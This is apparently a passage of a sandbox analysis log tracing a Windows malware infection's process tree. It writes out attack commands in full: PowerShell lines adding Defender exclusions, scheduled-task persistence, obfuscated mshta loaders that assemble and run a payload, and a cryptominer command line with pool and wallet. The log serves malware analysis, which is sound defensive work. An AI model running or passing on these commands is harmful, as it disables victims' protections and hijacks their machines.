        Program crash
        
        PID:5432
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 904
        8⤵
        Program crash
        
        PID:5740
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 968
        8⤵
        Executes dropped EXE
        Program crash
        Suspicious use of SetWindowsHookEx
        
        PID:5920
        
        C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
        7⤵
        
        PID:3204
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        8⤵
        
        PID:5892
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
        9⤵
        
        PID:4232
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x238,0x23c,0x240,0x214,0x244,0x7ffc4e66dec0,0x7ffc4e66ded0,0x7ffc4e66dee0
        10⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        7⤵
        Executes dropped EXE
        
        PID:4452
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        8⤵
        
        PID:6448
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        9⤵
        
        PID:7152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        10⤵
        
        PID:7008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        10⤵
        
        PID:3336
        
        C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        9⤵
        
        PID:3700
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        10⤵
        Creates scheduled task(s)
        
        PID:3224
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Windows\system32\services64.exe"
        9⤵
        
        PID:3976
        
        C:\Windows\system32\services64.exe
        
        C:\Windows\system32\services64.exe
        10⤵
        
        PID:4932
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
        11⤵
        
        PID:8168
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        12⤵
        
        PID:1508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        13⤵
        
        PID:8856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        13⤵
        
        PID:7764
        
        C:\Windows\system32\Microsoft\Libs\sihost64.exe
        
        "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
        12⤵
        
        PID:680
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        13⤵
        
        PID:3384
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
        12⤵
        
        PID:8164
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:688
    - - C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat14febbc433.exe
        
        Sat14febbc433.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:1732
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 660
        6⤵
        Drops file in Windows directory
        Program crash
        
        PID:2940
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 676
        6⤵
        Program crash
        
        PID:1856
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 636
        6⤵
        Program crash
        
        PID:4668
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 668
        6⤵
        Program crash
        
        PID:1308
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 884
        6⤵
        Program crash
        
        PID:5280
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 932
        6⤵
        Program crash
        
        PID:5192
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 1096
        6⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:504
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe
      4⤵
      PID:1292
    - - C:\Users\Admin\AppData\Local\Temp\7zS0A905A96\Sat1487ca754e680f91.exe
        
        Sat1487ca754e680f91.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:4024
      - C:\Users\Admin\Pictures\Adobe Films\Q__E9dnTTvzMRDObKFW3jYTq.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Q__E9dnTTvzMRDObKFW3jYTq.exe"
        6⤵
        Executes dropped EXE
        
        PID:5644
      - C:\Users\Admin\Pictures\Adobe Films\5PRh_R0QI64w5t9eBn2iqox2.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\5PRh_R0QI64w5t9eBn2iqox2.exe"
        6⤵
        
        PID:1980
      - C:\Users\Admin\Pictures\Adobe Films\aXhWwRlFiTz_d9ZgGw_y44PI.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\aXhWwRlFiTz_d9ZgGw_y44PI.exe"
        6⤵
        
        PID:6036
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:6500
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5516
        
        C:\Users\Admin\Documents\4vPhCPGql58MdSh4SEyPbdqv.exe
        
        "C:\Users\Admin\Documents\4vPhCPGql58MdSh4SEyPbdqv.exe"
        7⤵
        
        PID:3276
        
        C:\Users\Admin\Pictures\Adobe Films\Y9v_og42KHxrl9V8XTjSxbd8.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Y9v_og42KHxrl9V8XTjSxbd8.exe"
        8⤵
        
        PID:1260
        
        C:\Users\Admin\Pictures\Adobe Films\1yzJr6_iWy60wEE8xJA747gG.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\1yzJr6_iWy60wEE8xJA747gG.exe"
        8⤵
        
        PID:4156
        
        C:\Users\Admin\Pictures\Adobe Films\ScIORgE49iI6RJMoOvOk_BAK.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ScIORgE49iI6RJMoOvOk_BAK.exe"
        8⤵
        
        PID:4800
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        9⤵
        
        PID:4528
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        10⤵
        Kills process with taskkill
        
        PID:3804
        
        C:\Users\Admin\Pictures\Adobe Films\x3d8fWxdxPtJexNwXNlD2Y91.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\x3d8fWxdxPtJexNwXNlD2Y91.exe"
        8⤵
        
        PID:6300
        
        C:\Users\Admin\Pictures\Adobe Films\NiZiiOnyLnuO8GHijlaxV1Jf.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\NiZiiOnyLnuO8GHijlaxV1Jf.exe"
        8⤵
        
        PID:5592
        
        C:\Users\Admin\Pictures\Adobe Films\8RFz3RX2BxK76k5kswW2XbbQ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\8RFz3RX2BxK76k5kswW2XbbQ.exe"
        8⤵
        
        PID:5080
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\8RFz3RX2BxK76k5kswW2XbbQ.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\8RFz3RX2BxK76k5kswW2XbbQ.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        9⤵
        
        PID:1696
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\8RFz3RX2BxK76k5kswW2XbbQ.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\8RFz3RX2BxK76k5kswW2XbbQ.exe" ) do taskkill -f -iM "%~NxM"
        10⤵
        
        PID:6652
        
        C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
        
        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
        11⤵
        
        PID:1840
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        12⤵
        
        PID:6912
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
        13⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
        12⤵
        
        PID:7964
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
        13⤵
        
        PID:8096
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
        14⤵
        
        PID:7380
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
        14⤵
        
        PID:1752
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -Y ..\lXQ2g.WC
        14⤵
        
        PID:8608
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "8RFz3RX2BxK76k5kswW2XbbQ.exe"
        11⤵
        Kills process with taskkill
        
        PID:5512
        
        C:\Users\Admin\Pictures\Adobe Films\SjA7LiB4PxZ2B2zOIOdSDl6K.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\SjA7LiB4PxZ2B2zOIOdSDl6K.exe"
        8⤵
        
        PID:6228
        
        C:\Users\Admin\AppData\Local\Temp\is-UINKH.tmp\SjA7LiB4PxZ2B2zOIOdSDl6K.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UINKH.tmp\SjA7LiB4PxZ2B2zOIOdSDl6K.tmp" /SL5="$11035A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\SjA7LiB4PxZ2B2zOIOdSDl6K.exe"
        9⤵
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\is-949NB.tmp\DYbALA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-949NB.tmp\DYbALA.exe" /S /UID=2709
        10⤵
        
        PID:5648
        
        C:\Program Files\Windows NT\TANJKADDDF\foldershare.exe
        
        "C:\Program Files\Windows NT\TANJKADDDF\foldershare.exe" /VERYSILENT
        11⤵
        
        PID:7396
        
        C:\Users\Admin\AppData\Local\Temp\e9-b4077-59f-f01a5-8e895615c5072\Ludaeholaly.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e9-b4077-59f-f01a5-8e895615c5072\Ludaeholaly.exe"
        11⤵
        
        PID:7476
        
        C:\Users\Admin\AppData\Local\Temp\55-849ad-71e-75292-a2b6ff512a0ed\Sanaefygafy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\55-849ad-71e-75292-a2b6ff512a0ed\Sanaefygafy.exe"
        11⤵
        
        PID:7576
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hgrt3kgi.yd1\GcleanerEU.exe /eufive & exit
        12⤵
        
        PID:1312
        
        C:\Users\Admin\AppData\Local\Temp\hgrt3kgi.yd1\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\hgrt3kgi.yd1\GcleanerEU.exe /eufive
        13⤵
        
        PID:8296
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yukizzpq.wg2\installer.exe /qn CAMPAIGN="654" & exit
        12⤵
        
        PID:7060
        
        C:\Users\Admin\AppData\Local\Temp\yukizzpq.wg2\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\yukizzpq.wg2\installer.exe /qn CAMPAIGN="654"
        13⤵
        
        PID:8388
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zswqhig2.kgt\any.exe & exit
        12⤵
        
        PID:2164
        
        C:\Users\Admin\AppData\Local\Temp\zswqhig2.kgt\any.exe
        
        C:\Users\Admin\AppData\Local\Temp\zswqhig2.kgt\any.exe
        13⤵
        
        PID:8472
        
        C:\Users\Admin\AppData\Local\Temp\zswqhig2.kgt\any.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zswqhig2.kgt\any.exe" -u
        14⤵
        
        PID:8760
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p0milzad.3oz\gcleaner.exe /mixfive & exit
        12⤵
        
        PID:4484
        
        C:\Users\Admin\AppData\Local\Temp\p0milzad.3oz\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\p0milzad.3oz\gcleaner.exe /mixfive
        13⤵
        
        PID:8480
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\akjdrghf.1av\autosubplayer.exe /S & exit
        12⤵
        
        PID:8288
        
        C:\Users\Admin\Pictures\Adobe Films\Wf_rqs0C8NUD79vdgP8LjtWh.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Wf_rqs0C8NUD79vdgP8LjtWh.exe"
        8⤵
        Executes dropped EXE
        
        PID:4204
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        9⤵
        
        PID:5376
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
        10⤵
        
        PID:8728
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f4,0x1f8,0x1fc,0x1ac,0x200,0x7ffc38b2dec0,0x7ffc38b2ded0,0x7ffc38b2dee0
        11⤵
        
        PID:508
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x134,0x138,0x13c,0x110,0x140,0x7ff750bc9e70,0x7ff750bc9e80,0x7ff750bc9e90
        12⤵
        
        PID:6168
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1664,15504494692573327969,3913361149357267977,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8728_223070472" --mojo-platform-channel-handle=1680 /prefetch:8
        11⤵
        
        PID:7540
        
        C:\Users\Admin\Pictures\Adobe Films\vjUiktkbLEnkbG4dYpdZsV_H.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\vjUiktkbLEnkbG4dYpdZsV_H.exe"
        8⤵
        
        PID:5108
        
        C:\Users\Admin\Pictures\Adobe Films\vjUiktkbLEnkbG4dYpdZsV_H.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\vjUiktkbLEnkbG4dYpdZsV_H.exe" -u
        9⤵
        
        PID:596
      - C:\Users\Admin\Pictures\Adobe Films\BgKbBly8MYhyBVMR7YcPo8F2.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\BgKbBly8MYhyBVMR7YcPo8F2.exe"
        6⤵
        
        PID:5224
      - C:\Users\Admin\Pictures\Adobe Films\1iDU7d7YyGBQIt1Yi9La68Qb.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\1iDU7d7YyGBQIt1Yi9La68Qb.exe"
        6⤵
        
        PID:768
        
        C:\Users\Admin\Pictures\Adobe Films\1iDU7d7YyGBQIt1Yi9La68Qb.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\1iDU7d7YyGBQIt1Yi9La68Qb.exe"
        7⤵
        
        PID:6664
      - C:\Users\Admin\Pictures\Adobe Films\WQuUAdFOCSPEdIDEqe0ds0wl.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\WQuUAdFOCSPEdIDEqe0ds0wl.exe"
        6⤵
        
        PID:6084
      - C:\Users\Admin\Pictures\Adobe Films\LXbF_ijD_rK8Rq2FCUMM0TH2.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\LXbF_ijD_rK8Rq2FCUMM0TH2.exe"
        6⤵
        
        PID:2468
      - C:\Users\Admin\Pictures\Adobe Films\4LRTANbJCgUMILuMufTwEeab.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\4LRTANbJCgUMILuMufTwEeab.exe"
        6⤵
        
        PID:6168
        
        C:\Users\Admin\AppData\Local\Temp\6e5376b6-2e26-4f9b-b97f-50a1413108f8\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6e5376b6-2e26-4f9b-b97f-50a1413108f8\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\6e5376b6-2e26-4f9b-b97f-50a1413108f8\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        7⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\6e5376b6-2e26-4f9b-b97f-50a1413108f8\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6e5376b6-2e26-4f9b-b97f-50a1413108f8\AdvancedRun.exe" /SpecialRun 4101d8 3908
        8⤵
        
        PID:5848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\4LRTANbJCgUMILuMufTwEeab.exe" -Force
        7⤵
        
        PID:5420
        
        C:\Users\Admin\Pictures\Adobe Films\4LRTANbJCgUMILuMufTwEeab.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\4LRTANbJCgUMILuMufTwEeab.exe"
        7⤵
        
        PID:4168
      - C:\Users\Admin\Pictures\Adobe Films\A5rF7e8bAs42GoFgu7_ou5fF.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\A5rF7e8bAs42GoFgu7_ou5fF.exe"
        6⤵
        
        PID:6220
      - C:\Users\Admin\Pictures\Adobe Films\nDno_1iE87SCARnlawV3Dllh.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\nDno_1iE87SCARnlawV3Dllh.exe"
        6⤵
        
        PID:6240
      - C:\Users\Admin\Pictures\Adobe Films\TBkNZsNpFv9Cq5QkhzPBQF7d.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\TBkNZsNpFv9Cq5QkhzPBQF7d.exe"
        6⤵
        
        PID:6316
      - C:\Users\Admin\Pictures\Adobe Films\iytOVP5m0J_Sdsvjv54Aj99g.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\iytOVP5m0J_Sdsvjv54Aj99g.exe"
        6⤵
        
        PID:6276
      - C:\Users\Admin\Pictures\Adobe Films\0IO5QUQ3vKkNDKi19_Hsi_7p.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\0IO5QUQ3vKkNDKi19_Hsi_7p.exe"
        6⤵
        
        PID:6212
        
        C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
        
        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
        7⤵
        
        PID:6736
        
        C:\Program Files (x86)\Company\NewProduct\inst3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\inst3.exe"
        7⤵
        
        PID:6724
        
        C:\Program Files (x86)\Company\NewProduct\cutm3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
        7⤵
        
        PID:6716
      - C:\Users\Admin\Pictures\Adobe Films\k7oG3z33nF9TmxsSLk1p0LFG.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\k7oG3z33nF9TmxsSLk1p0LFG.exe"
        6⤵
        
        PID:6344
        
        C:\Users\Admin\AppData\Local\Temp\515265f4-a8ce-4b23-b95d-f7477ec8a0f5\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\515265f4-a8ce-4b23-b95d-f7477ec8a0f5\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\515265f4-a8ce-4b23-b95d-f7477ec8a0f5\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        7⤵
        
        PID:5620
        
        C:\Users\Admin\AppData\Local\Temp\515265f4-a8ce-4b23-b95d-f7477ec8a0f5\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\515265f4-a8ce-4b23-b95d-f7477ec8a0f5\AdvancedRun.exe" /SpecialRun 4101d8 5620
        8⤵
        
        PID:4288
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\k7oG3z33nF9TmxsSLk1p0LFG.exe" -Force
        7⤵
        
        PID:5376
        
        C:\Users\Admin\Pictures\Adobe Films\k7oG3z33nF9TmxsSLk1p0LFG.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\k7oG3z33nF9TmxsSLk1p0LFG.exe"
        7⤵
        
        PID:4176
      - C:\Users\Admin\Pictures\Adobe Films\QdbQ8D_BA9nzdXs2djxjYfug.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\QdbQ8D_BA9nzdXs2djxjYfug.exe"
        6⤵
        
        PID:6440
      - C:\Users\Admin\Pictures\Adobe Films\OvtzZo6u8_tEuDB0MoJRkOCn.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\OvtzZo6u8_tEuDB0MoJRkOCn.exe"
        6⤵
        
        PID:6432
      - C:\Users\Admin\Pictures\Adobe Films\nupfNTWh8tSMZ0DqhmhGz4Jb.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\nupfNTWh8tSMZ0DqhmhGz4Jb.exe"
        6⤵
        
        PID:6580
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:5800
      - C:\Users\Admin\Pictures\Adobe Films\L_bnMoVRYBSXqq2RVMYvsNBV.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\L_bnMoVRYBSXqq2RVMYvsNBV.exe"
        6⤵
        
        PID:4048
        
        C:\Users\Admin\AppData\Local\Temp\is-8K5B9.tmp\L_bnMoVRYBSXqq2RVMYvsNBV.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8K5B9.tmp\L_bnMoVRYBSXqq2RVMYvsNBV.tmp" /SL5="$603D2,506127,422400,C:\Users\Admin\Pictures\Adobe Films\L_bnMoVRYBSXqq2RVMYvsNBV.exe"
        7⤵
        
        PID:3676
        
